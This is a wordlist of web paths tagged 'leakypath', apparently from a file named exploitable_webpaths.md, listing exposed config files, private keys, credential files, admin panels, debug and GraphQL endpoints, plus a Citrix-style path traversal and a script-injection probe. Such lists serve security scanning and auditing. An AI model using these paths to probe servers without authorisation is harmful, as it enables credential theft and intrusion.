leakypath	/plugins/servlet/gadgets/makeRequest
leakypath	/plugins/servlet/oauth/users/icon
leakypath	/plugins/servlet/svnwebclient/changedResource.jsp
leakypath	/plugins/servlet/svnwebclient/commitGraph.jsp
leakypath	/plugins/servlet/svnwebclient/error.jsp
leakypath	/plugins/servlet/svnwebclient/statsItem.jsp
leakypath	/plugins/servlet/Wallboard/
leakypath	/PMUser/
leakypath	/pods
leakypath	/pools/default/buckets
leakypath	/portal
leakypath	/portal-graphql
leakypath	/portal/favicon.ico
leakypath	/portal/images/MyVue/MyVueHelp.png
leakypath	/powershell/
leakypath	/pprof
leakypath	/private
leakypath	/private-key
leakypath	/private.pem
leakypath	/privatekey.key
leakypath	/prod2local.sh
leakypath	/production.log
leakypath	/profile
leakypath	/proftpd.conf
leakypath	/properties.ini
leakypath	/provider.tf
leakypath	/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/proxy
leakypath	/proxy.stream?origin=http
leakypath	/PRTG/index.htm
leakypath	/prtg/index.htm
leakypath	/prweb/PRRestService/unauthenticatedAPI/v1/docs
leakypath	/public/
leakypath	/public/adminer.php
leakypath	/public/config.js
leakypath	/public/plugins/alertGroups/
leakypath	/public/plugins/alertlist/
leakypath	/public/plugins/alertmanager/
leakypath	/public/plugins/annolist/
leakypath	/public/plugins/barchart/
leakypath	/public/plugins/bargauge/
leakypath	/public/plugins/canvas/
leakypath	/public/plugins/cloudwatch/
leakypath	/public/plugins/dashboard/
leakypath	/public/plugins/dashlist/
leakypath	/public/plugins/debug/
leakypath	/public/plugins/elasticsearch/
leakypath	/public/plugins/gauge/
leakypath	/public/plugins/geomap/
leakypath	/public/plugins/gettingstarted/
leakypath	/public/plugins/grafana/
leakypath	/public/plugins/graph/
leakypath	/public/plugins/graphite/
leakypath	/public/plugins/heatmap/
leakypath	/public/plugins/histogram/
leakypath	/public/plugins/icon/
leakypath	/public/plugins/influxdb/
leakypath	/public/plugins/jaeger/
leakypath	/public/plugins/live/
leakypath	/public/plugins/logs/
leakypath	/public/plugins/loki/
leakypath	/public/plugins/mixed/
leakypath	/public/plugins/mssql/
leakypath	/public/plugins/mysql/
leakypath	/public/plugins/news/
leakypath	/public/plugins/nodeGraph/
leakypath	/public/plugins/opentsdb/
leakypath	/public/plugins/piechart/
leakypath	/public/plugins/pluginlist/
leakypath	/public/plugins/postgres/
leakypath	/public/plugins/prometheus/
leakypath	/public/plugins/stat/
leakypath	/public/plugins/state-timeline/
leakypath	/public/plugins/status-history/
leakypath	/public/plugins/table-old/
leakypath	/public/plugins/table/
leakypath	/public/plugins/tempo/
leakypath	/public/plugins/testdata/
leakypath	/public/plugins/text/
leakypath	/public/plugins/timeseries/
leakypath	/public/plugins/welcome/
leakypath	/public/plugins/xychart/
leakypath	/public/plugins/zipkin/
leakypath	/publicadminer.php
leakypath	/pyproject.toml
leakypath	/query
leakypath	/query-api
leakypath	/query-explorer
leakypath	/query-laravel
leakypath	/radio/application/configs/application.ini
leakypath	/rails/actions?error=ActiveRecord
leakypath	/railsapp/config/storage.yml
leakypath	/reach/sip.svc
leakypath	/read_file
leakypath	/readfile
leakypath	/README.md
leakypath	/readme.txt
leakypath	/redmine/config/configuration.yml
leakypath	/redmine/config/environment.rb
leakypath	/redmine/config/initializers/secret_token.rb
leakypath	/redmine/config/secrets.yml
leakypath	/redmine/config/settings.yml
leakypath	/redoc
leakypath	/reminder.sh
leakypath	/remote/login
leakypath	/Reports/Pages/Folder.aspx
leakypath	/ReportServer
leakypath	/ReportServer/Pages/ReportViewer.aspx
leakypath	/requesthandler/
leakypath	/requesthandlerext/
leakypath	/rest/api/2/dashboard?maxResults=100
leakypath	/rest/api/2/project?maxResults=100
leakypath	/rest/api/latest/groupuserpicker
leakypath	/rest/api/latest/serverInfo
leakypath	/rest/beta/repositories/go/group
leakypath	/rest/tinymce/1/macro/preview
leakypath	/rgs/
leakypath	/rgsclients/
leakypath	/robomongo.json
leakypath	/robots.txt
leakypath	/roundcube/logs/errors.log
leakypath	/roundcube/logs/sendmail
leakypath	/routes/error_log
leakypath	/rpc/
leakypath	/rpcwithcert/
leakypath	/ruby/config/storage.yml
leakypath	/run
leakypath	/run.sh
leakypath	/runningpods/
leakypath	/s/sfsites/aura
leakypath	/s3cmd.ini
leakypath	/s3proxy.conf
leakypath	/sap/bc/gui/sap/its/webgui
leakypath	/sap/hana/xs/formLogin/login.html
leakypath	/sap/wdisp/admin/public/default.html
leakypath	/sapi/debug/default/view
leakypath	/scheduler/
leakypath	/schema
leakypath	/schema.rb
leakypath	/script
leakypath	/search
leakypath	/search/members/
leakypath	/search/token.json
leakypath	/secret_token.rb
leakypath	/secrets.yml
leakypath	/secure/ConfigurePortalPages!default.jspa?view=popular
leakypath	/secure/ContactAdministrators!default.jspa
leakypath	/secure/Dashboard.jspa
leakypath	/secure/ManageFilters.jspa
leakypath	/secure/popups/UserPickerBrowser.jspa
leakypath	/secure/QueryComponent!Default.jspa
leakypath	/secure/ViewUserHover.jspa
leakypath	/security.txt
leakypath	/security.yml
leakypath	/sell
leakypath	/seminovos/application/configs/application.ini
leakypath	/server
leakypath	/server.key
leakypath	/server/storage/
leakypath	/service-account-credentials.json
leakypath	/service/rest/swagger.json
leakypath	/service?Wsdl
leakypath	/servicedesk/customer/user/login
leakypath	/servicedesk/customer/user/signup
leakypath	/services/Version
leakypath	/servlet/Satellite
leakypath	/servlet/taskProc
leakypath	/servlist.conf
leakypath	/sessions/new
leakypath	/settings.php.bak
leakypath	/settings.php.dist
leakypath	/settings.php.old
leakypath	/settings.php.save
leakypath	/settings.php.swp
leakypath	/settings.php.txt
leakypath	/settings.py
leakypath	/settings.yml
leakypath	/settings/settings.py
leakypath	/setup.sh
leakypath	/sfsites/aura
leakypath	/sftp-config.json
leakypath	/share/page/dologin
leakypath	/shop/
leakypath	/shop/application/configs/application.ini
leakypath	/shutdown
leakypath	/sidekiq
leakypath	/site.sql
leakypath	/site_cg/application/configs/application.ini
leakypath	/sitecore/shell/sitecore.version.xml
leakypath	/sitemanager.xml
leakypath	/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit
leakypath	/slr/application/configs/application.ini
leakypath	/smb.conf
leakypath	/solr/
leakypath	/sphinx
leakypath	/sphinx-graphiql
leakypath	/spring
leakypath	/sql.sql
leakypath	/ssl/localhost.key
leakypath	/sslmgr
leakypath	/startup.sh
leakypath	/stat.jsp
leakypath	/static/
leakypath	/stats/summary
leakypath	/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E
leakypath	/status.php
leakypath	/status/selfDiscovered/status
leakypath	/storage.yml
leakypath	/storage/
leakypath	/storage/logs/laravel.log
leakypath	/store/app/etc/local.xml
leakypath	/subscriptions
leakypath	/svnserve.conf
leakypath	/swagger
leakypath	/swagger-resources
leakypath	/swagger-resources/restservices/v2/api-docs
leakypath	/swagger-ui
leakypath	/swagger-ui.html
leakypath	/swagger-ui.js
leakypath	/swagger-ui/swagger-ui.js
leakypath	/swagger.json
leakypath	/swagger.yaml
leakypath	/swagger/api-docs
leakypath	/swagger/index.html
leakypath	/swagger/swagger
leakypath	/swagger/swagger-ui.html
leakypath	/swagger/swagger-ui.js
leakypath	/swagger/ui/index
leakypath	/swagger/ui/swagger-ui.js
leakypath	/swagger/v1/api-docs
leakypath	/swagger/v1/swagger.json
leakypath	/swagger/v1/swagger.json/
leakypath	/swagger/v1/swagger.yaml
leakypath	/swagger/v2/api-docs
leakypath	/swagger/v2/swagger.json
leakypath	/swagger/v2/swagger.yaml
leakypath	/sysmgmt/2015/bmc/info
leakypath	/system
leakypath	/system-diagnostics
leakypath	/systemstatus.xml
leakypath	/temp.php
leakypath	/temp.sql
leakypath	/test
leakypath	/test.cgi
leakypath	/test/config/secrets.yml
leakypath	/threaddump
leakypath	/Thumbs.db
leakypath	/tiki
leakypath	/time.php
leakypath	/tmui/login.jsp
leakypath	/tmui/tmui/login/welcome.jsp
leakypath	/token.json
leakypath	/tool/view/phpinfo.view.php
leakypath	/tools/adminer.php
leakypath	/toolsadminer.php
leakypath	/trace
leakypath	/Trace.axd
leakypath	/translate.sql
leakypath	/translations/en.json
leakypath	/ucwa/
leakypath	/ueditor/php/getRemoteImage.php
leakypath	/ui/login.action
leakypath	/ui/vault/auth
leakypath	/unifiedmessaging/
leakypath	/update.sh
leakypath	/user
leakypath	/user.ini
leakypath	/user/0
leakypath	/user/1
leakypath	/user/2
leakypath	/user/3
leakypath	/user/login
leakypath	/userportal/webpages/myaccount/login.jsp
leakypath	/users.sql
leakypath	/v0.1/
leakypath	/v1
leakypath	/v1.0/
leakypath	/v1/
leakypath	/v1/altair
leakypath	/v1/api-docs
leakypath	/v1/api/graphql
leakypath	/v1/explorer
leakypath	/v1/graph
leakypath	/v1/graphiql
leakypath	/v1/graphiql.css
leakypath	/v1/graphiql.js
leakypath	/v1/graphiql.min.css
leakypath	/v1/graphiql.min.js
leakypath	/v1/graphiql.php
leakypath	/v1/graphiql/finland
leakypath	/v1/graphql
leakypath	/v1/graphql-explorer
leakypath	/v1/graphql.php
leakypath	/v1/graphql/console
leakypath	/v1/graphql/schema.json
leakypath	/v1/graphql/schema.xml
leakypath	/v1/graphql/schema.yaml
leakypath	/v1/playground
leakypath	/v1/subscriptions
leakypath	/v2
leakypath	/v2/altair
leakypath	/v2/api-docs
leakypath	/v2/api/graphql
leakypath	/v2/explorer
leakypath	/v2/graph
leakypath	/v2/graphiql
leakypath	/v2/graphiql.css
leakypath	/v2/graphiql.js
leakypath	/v2/graphiql.min.css
leakypath	/v2/graphiql.min.js
leakypath	/v2/graphiql.php
leakypath	/v2/graphiql/finland
leakypath	/v2/graphql
leakypath	/v2/graphql-explorer
leakypath	/v2/graphql.php
leakypath	/v2/graphql/console
leakypath	/v2/graphql/schema.json
leakypath	/v2/graphql/schema.xml
leakypath	/v2/graphql/schema.yaml
leakypath	/v2/keys/
leakypath	/v2/playground
leakypath	/v2/subscriptions
leakypath	/v3
leakypath	/v3/altair
leakypath	/v3/api/graphql
leakypath	/v3/explorer
leakypath	/v3/graph
leakypath	/v3/graphiql
leakypath	/v3/graphiql.css
leakypath	/v3/graphiql.js
leakypath	/v3/graphiql.min.css
leakypath	/v3/graphiql.min.js
leakypath	/v3/graphiql.php
leakypath	/v3/graphiql/finland
leakypath	/v3/graphql
leakypath	/v3/graphql-explorer
leakypath	/v3/graphql.php
leakypath	/v3/graphql/console
leakypath	/v3/graphql/schema.json
leakypath	/v3/graphql/schema.xml
leakypath	/v3/graphql/schema.yaml
leakypath	/v3/playground
leakypath	/v3/subscriptions
leakypath	/v4/altair
leakypath	/v4/api/graphql
leakypath	/v4/explorer
leakypath	/v4/graph
leakypath	/v4/graphiql
leakypath	/v4/graphiql.css
leakypath	/v4/graphiql.js
leakypath	/v4/graphiql.min.css
leakypath	/v4/graphiql.min.js
leakypath	/v4/graphiql.php
leakypath	/v4/graphiql/finland
leakypath	/v4/graphql
leakypath	/v4/graphql-explorer
leakypath	/v4/graphql.php
leakypath	/v4/graphql/console
leakypath	/v4/graphql/schema.json
leakypath	/v4/graphql/schema.xml
leakypath	/v4/graphql/schema.yaml
leakypath	/v4/playground
leakypath	/v4/subscriptions
leakypath	/Vagrantfile
leakypath	/var/jwt/private.pem
leakypath	/vendor/composer/installed.json
leakypath	/vendor/phpunit/phpunit/phpunit
leakypath	/vendor/webmozart/assert/.composer-auth.json
leakypath	/version
leakypath	/version.web
leakypath	/views/ajax/autocomplete/user/a
leakypath	/virtualems/Login.aspx
leakypath	/VirtualEms/Login.aspx
leakypath	/vpn/../vpns/cfg/smb.conf
leakypath	/vpn/index.html
leakypath	/wavemaker/studioService.download
leakypath	/WEB-INF/web.xml
leakypath	/web.config
leakypath	/web/adminer.php
leakypath	/web/debug/default/view
leakypath	/web/home.html
leakypath	/web/index.html
leakypath	/web/manifest.json
leakypath	/web/phpmyadmin/
leakypath	/web/settings/settings.py
leakypath	/web/static/c
leakypath	/web_caps/webCapsConfig
leakypath	/webadmin/out
leakypath	/webadmin/start/
leakypath	/webadmin/tools/systemstatus_remote.php
leakypath	/webadmin/tools/unixlogin.php
leakypath	/webadminer.php
leakypath	/webalizer/
leakypath	/webapi/v1/system/accountmanage/account
leakypath	/webapp/
leakypath	/webclient/Login.xhtml
leakypath	/webconsole/webpages/login.jsp
leakypath	/webmail/
leakypath	/webmin/
leakypath	/webpack.config.js
leakypath	/webpack.mix.js
leakypath	/WebReport/ReportServer
leakypath	/webstats/awstats.pl
leakypath	/webticket/
leakypath	/webticket/webticketservice.svc
leakypath	/webticket/webticketservice.svcabs/
leakypath	/wgetrc
leakypath	/whoAmI/
leakypath	/wiki
leakypath	/wp
leakypath	/ws2020/
leakypath	/ws2021/
leakypath	/ws_ftp.ini
leakypath	/www.key
leakypath	/www/delivery/afr.php
leakypath	/xampp/phpmyadmin/
leakypath	/xmldata
leakypath	/XmlPeek.aspx
leakypath	/xmlpserver/servlet/adfresource
leakypath	/xmlrpc.php
leakypath	/xprober.php
leakypath	/yarn.lock
leakypath	/yii/vendor/phpunit/phpunit/phpunit
leakypath	/zabbix.php?action=dashboard.view&dashboardid=1
leakypath	/zend/vendor/phpunit/phpunit/phpunit
leakypath	/zenphoto/zp
leakypath	/zipkin/
leakypath	/zm/?view=log
leakypath	/zp
leakypath	/zp/zp

kafkaesqu3/exploitable_webpaths.md